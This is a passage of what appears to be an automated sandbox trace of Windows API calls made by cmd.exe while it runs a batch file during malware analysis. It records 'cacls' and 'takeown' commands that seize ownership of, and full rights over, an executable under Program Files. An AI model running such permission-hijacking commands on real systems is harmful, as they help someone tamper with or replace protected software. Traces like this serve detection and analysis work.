lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.648] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.648] GetProcessHeap () returned 0x650000 [0186.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x120) returned 0x664290 [0186.648] GetProcessHeap () returned 0x650000 [0186.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x238) returned 0x6643b8 [0186.656] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0186.656] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb54) returned 0xffffffff [0186.657] GetLastError () returned 0x2 [0186.657] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x2eeb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb54) returned 0xffffffff [0186.657] GetLastError () returned 0x2 [0186.657] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0186.658] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb54) returned 0x664568 [0186.658] GetProcessHeap () returned 0x650000 [0186.658] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6617f0, Size=0x4) returned 0x6617f0 [0186.658] FindClose (in: hFindFile=0x664568 | out: hFindFile=0x664568) returned 1 [0186.658] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb54) returned 0xffffffff [0186.659] GetLastError () returned 0x2 [0186.659] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb54) returned 0x664568 [0186.659] FindClose (in: hFindFile=0x664568 | out: hFindFile=0x664568) returned 1 [0186.659] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.659] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.659] GetConsoleTitleW (in: lpConsoleTitle=0x2eeba4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.660] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x664848, lpFilePart=0x2ee6c4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ee6c4*="Desktop") returned 0x25 [0186.660] SetErrorMode (uMode=0x0) returned 0x1 [0186.660] GetProcessHeap () returned 0x650000 [0186.660] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x664840, Size=0x60) returned 0x664840 [0186.660] GetProcessHeap () returned 0x650000 [0186.660] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x664840) returned 0x60 [0186.660] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.660] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.660] GetProcessHeap () returned 0x650000 [0186.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x120) returned 0x6648a8 [0186.661] GetProcessHeap () returned 0x650000 [0186.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x238) returned 0x6649d0 [0186.661] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0186.661] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2ee440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee440) returned 0xffffffff [0186.661] GetLastError () returned 0x2 [0186.662] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x2ee440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee440) returned 0xffffffff [0186.662] GetLastError () returned 0x2 [0186.662] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0186.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2ee440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee440) returned 0x664b80 [0186.662] FindClose (in: hFindFile=0x664b80 | out: hFindFile=0x664b80) returned 1 [0186.663] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2ee440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee440) returned 0xffffffff [0186.663] GetLastError () returned 0x2 [0186.663] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ee440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee440) returned 0x664b80 [0186.663] FindClose (in: hFindFile=0x664b80 | out: hFindFile=0x664b80) returned 1 [0186.663] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.663] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.663] GetConsoleTitleW (in: lpConsoleTitle=0x2ee938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.664] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ee7c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ee888 | out: lpAttributeList=0x2ee7c0, lpSize=0x2ee888) returned 1 [0186.664] UpdateProcThreadAttribute (in: lpAttributeList=0x2ee7c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ee880, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ee7c0, lpPreviousValue=0x0) returned 1 [0186.664] GetStartupInfoW (in: lpStartupInfo=0x2ee77c | out: lpStartupInfo=0x2ee77c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0186.664] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.667] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\component.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ee81c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\component.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ee868 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\component.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x2ee868*(hProcess=0x74, hThread=0x78, dwProcessId=0xab0, dwThreadId=0x72c)) returned 1 [0187.203] CloseHandle (hObject=0x78) returned 1 [0187.203] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.203] GetProcessHeap () returned 0x650000 [0187.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x665f90 | out: hHeap=0x650000) returned 1 [0187.203] GetEnvironmentStringsW () returned 0x665f90* [0187.203] GetProcessHeap () returned 0x650000 [0187.203] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb36) returned 0x666ad0 [0187.203] FreeEnvironmentStringsW (penv=0x665f90) returned 1 [0187.203] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0197.044] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x2ee75c | out: lpExitCode=0x2ee75c*=0x1f57) returned 1 [0197.045] CloseHandle (hObject=0x74) returned 1 [0197.045] _vsnwprintf (in: _Buffer=0x2ee8a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ee768 | out: _Buffer="00001F57") returned 8 [0197.045] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0197.045] GetProcessHeap () returned 0x650000 [0197.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x666ad0 | out: hHeap=0x650000) returned 1 [0197.045] GetEnvironmentStringsW () returned 0x665f90* [0197.045] GetProcessHeap () returned 0x650000 [0197.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb5c) returned 0x668178 [0197.045] FreeEnvironmentStringsW (penv=0x665f90) returned 1 [0197.045] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.045] GetProcessHeap () returned 0x650000 [0197.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x668178 | out: hHeap=0x650000) returned 1 [0197.045] GetEnvironmentStringsW () returned 0x665f90* [0197.046] GetProcessHeap () returned 0x650000 [0197.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb5c) returned 0x668178 [0197.046] FreeEnvironmentStringsW (penv=0x665f90) returned 1 [0197.046] GetProcessHeap () returned 0x650000 [0197.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x650db8 | out: hHeap=0x650000) returned 1 [0197.046] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ee7c0 | out: lpAttributeList=0x2ee7c0) [0197.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.046] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.046] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0197.047] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.047] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0197.047] SetConsoleInputExeNameW () returned 0x1 [0197.047] GetConsoleOutputCP () returned 0x1b5 [0197.048] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0197.048] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.048] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2eefdc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0197.049] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0197.049] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.049] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0197.049] GetProcessHeap () returned 0x650000 [0197.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664b00 | out: hHeap=0x650000) returned 1 [0197.049] GetProcessHeap () returned 0x650000 [0197.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6649d0 | out: hHeap=0x650000) returned 1 [0197.049] GetProcessHeap () returned 0x650000 [0197.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6648a8 | out: hHeap=0x650000) returned 1 [0197.049] GetProcessHeap () returned 0x650000 [0197.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664840 | out: hHeap=0x650000) returned 1 [0197.049] GetProcessHeap () returned 0x650000 [0197.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664780 | out: hHeap=0x650000) returned 1 [0197.050] GetProcessHeap () returned 0x650000 [0197.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664568 | out: hHeap=0x650000) returned 1 [0197.050] GetProcessHeap () returned 0x650000 [0197.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6644e8 | out: hHeap=0x650000) returned 1 [0197.050] GetProcessHeap () returned 0x650000 [0197.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6643b8 | out: hHeap=0x650000) returned 1 [0197.050] GetProcessHeap () returned 0x650000 [0197.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664290 | out: hHeap=0x650000) returned 1 [0197.050] GetProcessHeap () returned 0x650000 [0197.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664228 | out: hHeap=0x650000) returned 1 [0197.050] GetProcessHeap () returned 0x650000 [0197.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664170 | out: hHeap=0x650000) returned 1 [0197.050] GetProcessHeap () returned 0x650000 [0197.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x650ab8 | out: hHeap=0x650000) returned 1 [0197.050] GetProcessHeap () returned 0x650000 [0197.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x651230 | out: hHeap=0x650000) returned 1 [0197.050] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.050] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0197.050] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2eefc0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2eefc0*=0xc2, lpOverlapped=0x0) returned 1 [0197.051] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0197.051] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0197.051] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.052] GetFileType (hFile=0x74) returned 0x1 [0197.052] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.052] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0197.052] GetProcessHeap () returned 0x650000 [0197.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400a) returned 0x674b08 [0197.052] GetProcessHeap () returned 0x650000 [0197.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674b08 | out: hHeap=0x650000) returned 1 [0197.056] _tell (_FileHandle=3) returned 47 [0197.056] _close (_FileHandle=3) returned 0 [0197.056] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eed94 | out: _Buffer="\r\n") returned 2 [0197.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.056] GetFileType (hFile=0x7) returned 0x2 [0197.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0197.057] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed54 | out: lpMode=0x2eed54) returned 1 [0197.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.058] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eed80, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eed80*=0x2) returned 1 [0197.600] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0197.600] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0197.600] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eed90 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0197.600] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eed90 | out: _Buffer=">") returned 1 [0197.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.600] GetFileType (hFile=0x7) returned 0x2 [0198.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0198.885] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed58 | out: lpMode=0x2eed58) returned 1 [0198.885] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.886] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eed84, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eed84*=0x26) returned 1 [0198.886] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.886] GetFileType (hFile=0x7) returned 0x2 [0198.887] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0198.887] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefdc | out: lpMode=0x2eefdc) returned 1 [0198.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.887] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x650ac0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2ef008, lpReserved=0x0 | out: lpBuffer=0x650ac0*, lpNumberOfCharsWritten=0x2ef008*=0x7) returned 1 [0198.888] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef014 | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\component.exe\" ") returned 53 [0198.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.888] GetFileType (hFile=0x7) returned 0x2 [0198.889] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0198.889] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd4 | out: lpMode=0x2eefd4) returned 1 [0198.889] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.889] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x2ef000, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef000*=0x35) returned 1 [0198.890] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef034 | out: _Buffer="\r\n") returned 2 [0198.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.890] GetFileType (hFile=0x7) returned 0x2 [0198.890] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0198.890] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eeff4 | out: lpMode=0x2eeff4) returned 1 [0198.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.891] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef020*=0x2) returned 1 [0198.892] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0198.892] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0198.892] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0198.892] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0198.892] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0198.892] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0198.892] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0198.892] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0198.892] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0198.892] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0198.892] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0198.892] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0198.892] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0198.892] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0198.892] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0198.893] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0198.893] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0198.893] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0198.893] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0198.893] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0198.893] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0198.893] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0198.893] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0198.893] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0198.893] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0198.893] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0198.893] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0198.893] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0198.893] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0198.893] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0198.893] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0198.893] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0198.893] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0198.894] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0198.894] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0198.894] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0198.894] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0198.894] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0198.894] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0198.894] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0198.894] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0198.894] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0198.897] GetConsoleTitleW (in: lpConsoleTitle=0x2eeba4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.897] GetConsoleTitleW (in: lpConsoleTitle=0x2ee938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.898] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ee7c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ee888 | out: lpAttributeList=0x2ee7c0, lpSize=0x2ee888) returned 1 [0198.898] UpdateProcThreadAttribute (in: lpAttributeList=0x2ee7c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ee880, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ee7c0, lpPreviousValue=0x0) returned 1 [0198.898] GetStartupInfoW (in: lpStartupInfo=0x2ee77c | out: lpStartupInfo=0x2ee77c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0198.921] CloseHandle (hObject=0x74) returned 1 [0198.921] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0198.921] GetProcessHeap () returned 0x650000 [0198.921] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x668178 | out: hHeap=0x650000) returned 1 [0198.921] GetEnvironmentStringsW () returned 0x665f90* [0198.921] GetProcessHeap () returned 0x650000 [0198.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb5c) returned 0x668178 [0198.921] FreeEnvironmentStringsW (penv=0x665f90) returned 1 [0198.921] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0208.336] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2ee75c | out: lpExitCode=0x2ee75c*=0x0) returned 1 [0208.337] CloseHandle (hObject=0x78) returned 1 [0208.337] _vsnwprintf (in: _Buffer=0x2ee8a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ee768 | out: _Buffer="00000000") returned 8 [0208.338] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0208.338] GetProcessHeap () returned 0x650000 [0208.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x668178 | out: hHeap=0x650000) returned 1 [0208.338] GetEnvironmentStringsW () returned 0x665f90* [0208.338] GetProcessHeap () returned 0x650000 [0208.338] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb5c) returned 0x668178 [0208.338] FreeEnvironmentStringsW (penv=0x665f90) returned 1 [0208.338] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0208.338] GetProcessHeap () returned 0x650000 [0208.338] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x668178 | out: hHeap=0x650000) returned 1 [0208.339] GetEnvironmentStringsW () returned 0x665f90* [0208.339] GetProcessHeap () returned 0x650000 [0208.339] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb5c) returned 0x668178 [0208.339] FreeEnvironmentStringsW (penv=0x665f90) returned 1 [0208.339] GetProcessHeap () returned 0x650000 [0208.339] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x650db8 | out: hHeap=0x650000) returned 1 [0208.339] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ee7c0 | out: lpAttributeList=0x2ee7c0) [0208.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.339] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0208.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.340] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0208.340] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.340] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0208.340] SetConsoleInputExeNameW () returned 0x1 [0208.341] GetConsoleOutputCP () returned 0x1b5 [0208.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0208.341] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2eefdc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0208.342] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0208.342] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.342] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0208.342] GetProcessHeap () returned 0x650000 [0208.342] HeapFree (in: hHeap=0x650000, 